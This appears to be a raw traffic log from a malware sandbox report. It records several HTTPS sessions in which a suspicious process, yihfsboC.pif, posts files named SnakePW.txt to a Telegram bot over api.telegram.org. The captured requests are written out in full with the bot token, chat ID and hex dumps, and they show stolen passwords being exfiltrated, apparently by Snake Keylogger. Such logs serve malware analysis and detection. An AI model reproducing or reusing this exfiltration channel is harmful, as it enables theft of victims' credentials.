                                                                                                                2024-11-26 07:26:33 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389016,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                90192.168.2.750011149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:33 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1275f877ff90
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:33 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 35 66 38 37 37 66 66 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1275f877ff90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:33 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:33 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:33 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389018,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605993,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                91192.168.2.750017149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:35 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1121e522ff54
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:35 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 32 31 65 35 32 32 66 66 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd1121e522ff54Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:35 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 519
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:35 UTC519INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389020,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                92192.168.2.750018149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:35 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd112726dfdaef
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:35 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 32 37 32 36 64 66 64 61 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd112726dfdaefContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:35 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:35 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389022,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                93192.168.2.750019149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:35 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12d4ee8d8cfe
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:35 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 64 34 65 65 38 64 38 63 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd12d4ee8d8cfeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:35 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:35 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:35 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389024,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605995,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                94192.168.2.750023149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:37 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd114d7c71abd4
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 34 64 37 63 37 31 61 62 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd114d7c71abd4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:37 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:37 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389026,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                95192.168.2.750025149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:37 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11559464c338
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 35 35 39 34 36 34 63 33 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd11559464c338Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:37 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:37 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 39 30 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 39 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389029,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                96192.168.2.750027149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:37 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd131d191f6227
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 33 31 64 31 39 31 66 36 32 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd131d191f6227Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:37 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
